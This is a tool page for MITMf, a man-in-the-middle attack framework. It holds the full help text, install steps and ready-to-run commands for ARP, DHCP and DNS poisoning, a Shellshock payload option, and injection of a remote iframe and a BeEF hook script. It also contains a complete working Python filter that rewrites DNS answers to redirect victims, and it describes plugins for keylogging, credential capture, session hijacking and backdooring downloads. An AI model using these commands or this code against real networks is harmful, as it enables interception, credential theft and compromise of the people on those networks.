MITMf
MITMf Description
MITMf – Framework for Man-In-The-Middle attacks.
Description
MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.
Originally built to address the significant shortcomings of other tools (e.g. Ettercap, Mallory), it has been almost completely re-written from scratch to provide a modular and easily extensible framework that anyone can use to implement their own MITM attack.
Features
- The framework contains built-in SMB, HTTP and DNS servers that the various plugins can control and use. It also contains a modified version of the SSLStrip proxy that allows HTTP modification and a partial HSTS bypass.
- As of version 0.9.8, MITMf supports active packet filtering and manipulation (the role Ettercap's etterfilter used to fill, but with the full Scapy API instead of a filter language), allowing users to modify any type of traffic or protocol.
- The configuration file can be edited on-the-fly while MITMf is running; the changes are passed down through the framework, so you can tweak settings of plugins and servers while performing an attack.
- MITMf captures FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (over all supported protocols such as HTTP, SMB, LDAP etc.) and Kerberos credentials using Net-Creds, which is run on startup.
- Responder integration allows LLMNR, NBT-NS and MDNS poisoning and a rogue WPAD server.
Active packet filtering/modification
Any packet or protocol that MITMf intercepts can be modified with Scapy, which replaces what etterfilter did for Ettercap.
For example, here is a minimal filter that rewrites the destination IP address of every ICMP packet:

    if packet.haslayer(ICMP):
        log.info('Got an ICMP packet!')
        packet.dst = '192.168.1.0'

- Use the packet variable to access the packet as a Scapy object; the filter runs once per intercepted packet, and the (possibly modified) packet object is what MITMf sends on
- Use the data variable to access the raw packet bytes
To load the filter, all you need to do is:
python mitmf.py -F ~/filter.py
On its own that only sees packets that already pass through your host, so you will usually combine it with the Spoof plugin (for example --spoof --arp) to actually intercept another host's traffic.
Note: filters can be modified on-the-fly without restarting MITMf.
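As an added example (not code from MITMf or its author), here is what a DNS-spoofing filter has to do to an intercepted response: walk the answer section, overwrite the A records for the names you want to hijack, and fix the UDP checksum, which the receiving stack would otherwise use to discard the tampered datagram. It is written against the raw IPv4/UDP/DNS bytes that MITMf exposes as data so that it runs stand-alone without Scapy; the spoof map, addresses and the sample response are constructed for the demonstration. In a real MITMf filter you make the same change on the Scapy object instead: set rdata on each A-type DNSRR in packet[DNS].an, then del packet[IP].chksum and del packet[UDP].chksum so Scapy recomputes them when the packet is serialised.

```python
"""DNS answer rewriting at the byte level, shaped like a MITMf packet filter.

Added example, not MITMf code: works on the raw IPv4/UDP/DNS bytes (MITMf's
`data`) so it runs without Scapy. Names, IPs and the sample packet are constructed.
"""
import socket
import struct

# Hypothetical: names to hijack -> address the victim should be sent to instead.
SPOOF_MAP = {"login.example.com": "192.168.1.200"}


def _ones_complement_sum(buf):
    """RFC 1071 checksum over buf (zero-padded to an even length)."""
    if len(buf) % 2:
        buf += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(buf) // 2), buf))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _udp_checksum(src, dst, udp):
    """UDP checksum with the IPv4 pseudo-header; a computed 0 is sent as 0xFFFF."""
    pseudo = src + dst + struct.pack("!BBH", 0, 17, len(udp))
    return _ones_complement_sum(pseudo + udp[:6] + b"\x00\x00" + udp[8:]) or 0xFFFF


def _read_name(dns, off):
    """Read a possibly compressed name; return (name, offset just past it)."""
    labels, end = [], None
    for _ in range(128):  # bound pointer chains so a crafted packet cannot loop us
        length = dns[off]
        if length & 0xC0 == 0xC0:  # compression pointer into the message
            end = off + 2 if end is None else end
            off = struct.unpack("!H", dns[off:off + 2])[0] & 0x3FFF
        elif length == 0:
            end = off + 1 if end is None else end
            return b".".join(labels).decode("ascii", "replace").lower(), end
        else:
            labels.append(bytes(dns[off + 1:off + 1 + length]))
            off += 1 + length
    raise ValueError("name compression loop")


def _answers(dns):
    """Yield (name, rtype, rclass, rdata_offset, rdlen) for each answer RR."""
    flags, qdcount, ancount = struct.unpack("!HHH", dns[2:8])
    if not flags & 0x8000:  # QR bit clear: a query, nothing to rewrite
        return
    off = 12
    for _ in range(qdcount):  # skip the question section
        off = _read_name(dns, off)[1] + 4  # name, then QTYPE + QCLASS
    for _ in range(ancount):
        name, off = _read_name(dns, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", dns[off:off + 10])
        off += 10
        yield name, rtype, rclass, off, rdlen
        off += rdlen


def _dns_offsets(data):
    """(udp_offset, dns_offset) for an IPv4/UDP datagram from port 53, else None."""
    if len(data) < 28 or data[0] >> 4 != 4 or data[9] != 17:
        return None
    ihl = (data[0] & 0x0F) * 4
    if struct.unpack("!H", data[ihl:ihl + 2])[0] != 53 or len(data) < ihl + 20:
        return None
    return ihl, ihl + 8


def rewrite_dns_answers(data, spoof_map):
    """Return the packet with every A answer for a name in spoof_map repointed.

    Lengths never change, so only the UDP checksum must be recomputed: the IPv4
    header checksum covers the header alone. Non-matching packets come back as-is.
    """
    loc = _dns_offsets(data)
    if loc is None:
        return data
    udp_off, dns_off = loc
    dns = bytearray(data[dns_off:])
    changed = False
    for name, rtype, rclass, rd_off, rdlen in _answers(dns):
        if rtype == 1 and rclass == 1 and rdlen == 4 and name in spoof_map:
            dns[rd_off:rd_off + 4] = socket.inet_aton(spoof_map[name])
            changed = True
    if not changed:
        return data
    udp = bytearray(data[udp_off:dns_off]) + dns
    udp[6:8] = struct.pack("!H", _udp_checksum(data[12:16], data[16:20], bytes(udp)))
    return bytes(data[:udp_off]) + bytes(udp)


def a_answers(data):
    """[(name, ip)] for the A answers in a response; used to inspect results."""
    loc = _dns_offsets(data)
    if loc is None:
        return []
    dns = bytearray(data[loc[1]:])
    return [(n, socket.inet_ntoa(bytes(dns[o:o + 4])))
            for n, t, c, o, ln in _answers(dns) if t == 1 and c == 1 and ln == 4]


def udp_checksum_ok(data):
    """True when the datagram's UDP checksum verifies (the receiver's check)."""
    udp = data[(data[0] & 0x0F) * 4:]
    pseudo = data[12:16] + data[16:20] + struct.pack("!BBH", 0, 17, len(udp))
    return _ones_complement_sum(pseudo + udp) == 0


def build_dns_response(src_ip, dst_ip, qname, answer_ip, txid=0x1234):
    """Constructed sample: a minimal IPv4/UDP DNS response with one A answer."""
    qname_wire = b"".join(bytes([len(label)]) + label.encode() for label in qname.split(".")) + b"\x00"
    dns = (struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)      # QR=1, RD, RA
           + qname_wire + struct.pack("!HH", 1, 1)                # question: A, IN
           + struct.pack("!HHHIH", 0xC00C, 1, 1, 300, 4)          # name = pointer to offset 12
           + socket.inet_aton(answer_ip))
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    udp = struct.pack("!HHHH", 53, 40000, 8 + len(dns), 0) + dns
    udp = udp[:6] + struct.pack("!H", _udp_checksum(src, dst, udp)) + udp[8:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0x4000, 64, 17, 0, src, dst)
    return ip[:10] + struct.pack("!H", _ones_complement_sum(ip)) + ip[12:] + udp


if __name__ == "__main__":
    original = build_dns_response("192.168.1.1", "192.168.1.50", "login.example.com", "93.184.216.34")
    spoofed = rewrite_dns_answers(original, SPOOF_MAP)
    print(a_answers(original), "->", a_answers(spoofed), "checksum ok:", udp_checksum_ok(spoofed))
```

The checksum step is the part people forget when hand-patching packets: a rewritten rdata with a stale UDP checksum is silently dropped by the victim's stack, and the spoof appears not to work. The name parser follows RFC 1035 compression pointers (the answer's owner name is almost always a pointer back to the question) and caps the number of hops, since a filter runs on every packet an attacker-controlled peer can send you.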
Homepage: https://github.com/byt3bl33d3r/MITMf
Author: byt3bl33d3r
License: GPLv3
MITMf Help
usage: mitmf.py -i interface [mitmf options] [plugin name] [plugin options]
optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit MITMf: Options for MITMf --log-level {debug,info} Specify a log level [default: info] -i INTERFACE Interface to listen on -c CONFIG_FILE Specify config file to use -p, --preserve-cache Don't kill client/server caching -r READ_PCAP, --read-pcap READ_PCAP Parse specified pcap for credentials and exit -l PORT Port to listen on (default 10000) -f, --favicon Substitute a lock favicon on secure requests. -k, --killsessions Kill sessions in progress. -F FILTER, --filter FILTER Filter to apply to incoming traffic Upsidedownternet: Flips images 180 degrees --upsidedownternet Load plugin 'Upsidedownternet' AppCachePoison: Performs App Cache Poisoning attacks --appoison Load plugin 'AppCachePoison' Inject: Inject arbitrary content into HTML content --inject Load plugin 'Inject' --js-url JS_URL URL of the JS to inject --js-payload JS_PAYLOAD JS string to inject --js-file JS_FILE File containing JS to inject --html-url HTML_URL URL of the HTML to inject --html-payload HTML_PAYLOAD HTML string to inject --html-file HTML_FILE File containing HTML to inject --per-domain Inject once per domain per client. --rate-limit RATE_LIMIT Inject once every RATE_LIMIT seconds per client. --count-limit COUNT_LIMIT Inject only COUNT_LIMIT times per client. 
--white-ips IP Inject content ONLY for these ips (comma seperated) --black-ips IP DO NOT inject content for these ips (comma seperated) --white-domains DOMAINS Inject content ONLY for these domains (comma seperated) --black-domains DOMAINS DO NOT inject content for these domains (comma seperated) BrowserProfiler: Attempts to enumerate all browser plugins of connected clients --browserprofiler Load plugin 'BrowserProfiler' HTA Drive-By: Performs HTA drive-by attacks on clients --hta Load plugin 'HTA Drive-By' --text TEXT Text to display on notification bar --hta-app HTA_APP Path to HTA application [defaults to config/hta_driveby/flash_setup.hta] SSLstrip+: Enables SSLstrip+ for partial HSTS bypass --hsts Load plugin 'SSLstrip+' SMBTrap: Exploits the SMBTrap vulnerability on connected clients --smbtrap Load plugin 'SMBTrap' SMBAuth: Evoke SMB challenge-response auth attempts --smbauth Load plugin 'SMBAuth' JSKeylogger: Injects a javascript keylogger into clients webpages --jskeylogger Load plugin 'JSKeylogger' BrowserSniper: Performs drive-by attacks on clients with out-of-date browser plugins --browsersniper Load plugin 'BrowserSniper' FilePwn: Backdoor executables being sent over http using bdfactory --filepwn Load plugin 'FilePwn' Replace: Replace arbitrary content in HTML content --replace Load plugin 'Replace' ScreenShotter: Uses HTML5 Canvas to render an accurate screenshot of a clients browser --screen Load plugin 'ScreenShotter' --interval SECONDS Interval at which screenshots will be taken (default 10 seconds) ImageRandomizer: Replaces images with a random one from a specified directory --imgrand Load plugin 'ImageRandomizer' --img-dir DIRECTORY Directory with images Ferret-NG: Captures cookies and starts a proxy that will feed them to connected clients --ferretng Load plugin 'Ferret-NG' --port PORT Port to start Ferret-NG proxy on (default 10010) --load-cookies FILE Load cookies from a log file Responder: Poison LLMNR, NBT-NS and MDNS requests --responder 
Load plugin 'Responder' --analyze Allows you to see NBT-NS, BROWSER, LLMNR requests without poisoning --wredir Enables answers for netbios wredir suffix queries --nbtns Enables answers for netbios domain suffix queries --fingerprint Fingerprint hosts that issued an NBT-NS or LLMNR query --lm Force LM hashing downgrade for Windows XP/2003 and earlier --wpad Start the WPAD rogue proxy server --forcewpadauth Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt) --basic Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned Spoof: Redirect/Modify traffic using ICMP, ARP, DHCP or DNS --spoof Load plugin 'Spoof' --arp Redirect traffic using ARP spoofing --icmp Redirect traffic using ICMP redirects --dhcp Redirect traffic using DHCP offers --dns Proxy/Modify DNS queries --netmask NETMASK The netmask of the network --shellshock PAYLOAD Trigger the Shellshock vuln when spoofing DHCP, and execute specified command --gateway GATEWAY Specify the gateway IP --gatewaymac GATEWAYMAC Specify the gateway MAC [will auto resolve if ommited] --targets TARGETS Specify host/s to poison [if ommited will default to subnet] --ignore IGNORE Specify host/s not to poison --arpmode {rep,req} ARP Spoofing mode: replies (rep) or requests (req) [default: rep]
MITMf Usage Example
The most basic usage starts the HTTP proxy, the SMB, DNS and HTTP servers, and Net-Creds on interface enp3s0:
python mitmf.py -i enp3s0
ARP poison the whole subnet with the gateway at 192.168.1.1 using the Spoof plugin:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1
Same as above + a WPAD rogue proxy server using the Responder plugin:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad
ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1 (single hosts, ranges and CIDR blocks can be mixed, comma separated; the option is --targets as in the help output):
python mitmf.py -i enp3s0 --spoof --arp --targets 192.168.1.16-45,192.168.0.1/24 --gateway 192.168.1.1
Enable DNS spoofing while ARP poisoning (domains to spoof are pulled from the config file):
python mitmf.py -i enp3s0 --spoof --dns --arp --targets 192.168.1.0/24 --gateway 192.168.1.1
Enable LLMNR/NBTNS/MDNS spoofing:
python mitmf.py -i enp3s0 --responder --wredir --nbtns
Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):
python mitmf.py -i enp3s0 --spoof --dhcp
Same as above with a Shellshock payload that will be executed on any DHCP client whose dhclient hooks pass the crafted option to a vulnerable bash:
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
Inject an HTML IFrame using the Inject plugin:
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
Inject a JS script:
python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js
And much much more!
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
For a complete list of available options, just run
python mitmf.py --help
How to install MITMf
Installation on Kali Linux
MITMf is Python 2 code, which is why every recipe below creates a Python 2.7 virtualenv; it does not run under Python 3.
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev
pip install virtualenvwrapper
source /usr/local/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
pip install requests[security]
git clone https://github.com/byt3bl33d3r/MITMf
cd MITMf && git submodule init && git submodule update --recursive
pip install -r requirements.txt
python mitmf.py --help
In a new shell (for example after a reboot) the virtualenv is no longer active. Go to the directory with the installed program:
cd MITMf/
And re-activate the existing virtualenv (workon, not mkvirtualenv, which is for creating it):
source /usr/local/bin/virtualenvwrapper.sh
workon MITMf
python mitmf.py --help
Installation on BlackArch
pacman -S mitmf python2-setuptools libnetfilter_queue libpcap libjpeg-turbo capstone
sudo pip install virtualenvwrapper
source /usr/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
pip install requests[security]
cd /usr/share/mitmf/
pip install -r requirements.txt
cd
sudo python /usr/share/mitmf/mitmf.py --help
Edit your .bashrc or .zshrc file to source the virtualenvwrapper.sh script:
source /usr/bin/virtualenvwrapper.sh
Installation on Linux (Debian, Mint, Ubuntu)
sudo apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev python-pip git libffi-dev libnfnetlink*
sudo pip install capstone
sudo pip install virtualenvwrapper
sudo -s
source /usr/local/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
pip install requests[security]
git clone https://github.com/byt3bl33d3r/MITMf
cd MITMf && git submodule init && git submodule update --recursive
pip install -r requirements.txt
python mitmf.py --help
Inside the root shell the virtualenv's pip is already first in PATH; prefixing pip with sudo again would reset PATH and install into the system Python instead of the virtualenv.
In a new shell (for example after a reboot) the virtualenv is no longer active. Go to the directory with the installed program:
cd MITMf/
And re-activate the existing virtualenv (workon, not mkvirtualenv, which is for creating it):
sudo -s
source /usr/local/bin/virtualenvwrapper.sh
workon MITMf
python mitmf.py --help
MITMf Screenshots
The program is a command-line utility.
MITMf Tutorials
Coming soon…
Currently available plugins
- HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
- SMBTrap : Exploits the 'SMB Trap' vulnerability on connected clients
- ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a client's browser
- Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
- SSLstrip+ : Partially bypass HSTS
- Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
- BeEFAutorun : Autoruns BeEF modules based on a client's OS or browser type
- AppCachePoison : Performs HTML5 App-Cache poisoning attacks
- Ferret-NG : Transparently hijacks client sessions
- BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
- FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
- Inject : Inject arbitrary content into HTML content
- BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
- JSkeylogger : Injects a Javascript keylogger into a client's webpages
- Replace : Replace arbitrary content in HTML content
- SMBAuth : Evoke SMB challenge-response authentication attempts
- Upsidedownternet : Flips images 180 degrees